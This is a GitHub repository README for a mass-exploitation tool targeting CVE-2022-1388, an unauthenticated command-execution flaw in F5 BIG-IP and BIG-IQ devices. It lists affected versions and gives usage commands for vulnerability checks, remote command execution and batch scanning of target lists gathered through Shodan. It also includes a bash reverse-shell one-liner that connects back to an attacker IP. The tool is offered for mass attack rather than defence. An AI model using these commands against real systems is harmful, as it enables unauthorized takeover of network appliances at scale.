Skip to content

electr0lulz/Mass-CVE-2022-1388

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Dorks scan will be available soon.

Unfortunatelly is required a shodan account with basic feature to obtain more than 20k targets..

Vuln Impact

This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services.

Vuln Product

  • F5 BIG-IQ 11.6.1 - 11.6.5
  • F5 BIG-IP 12.1.0 - 12.1.6
  • F5 BIG-IP 13.1.0 - 13.1.4
  • F5 BIG-IP 14.1.0 - 14.1.4
  • F5 BIG-IP 15.1.0 - 15.1.5
  • F5 BIG-IP 16.1.0 - 16.1.2

Vunl Check

Basic usage

python3 expl.py

Vuln check

python3 expl.py -v true -u https://192.168.17.200

command execute:

python3 expl.py -a true -u https://192.168.17.200/ -c id
python3 expl.py -a true -u https://192.168.17.200/ -c whoami

batch scan

python3 expl.py -s true -f check.txt

Reserve Shell

python3 expl.py -r true -u https://192.168.17.200 -c "bash -i >&/dev/tcp/192.168.17.175/8888 0>&1"

Reference

https://support.f5.com/csp/article/K23605346
https://mp.weixin.qq.com/s/OC52LIGB5NTITy9EjvKdaw
https://twitter.com/jas502n/status/1523611433938059265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388
https://github.com/rancher/rancher/security/advisories/GHSA-pvxj-25m6-7vqr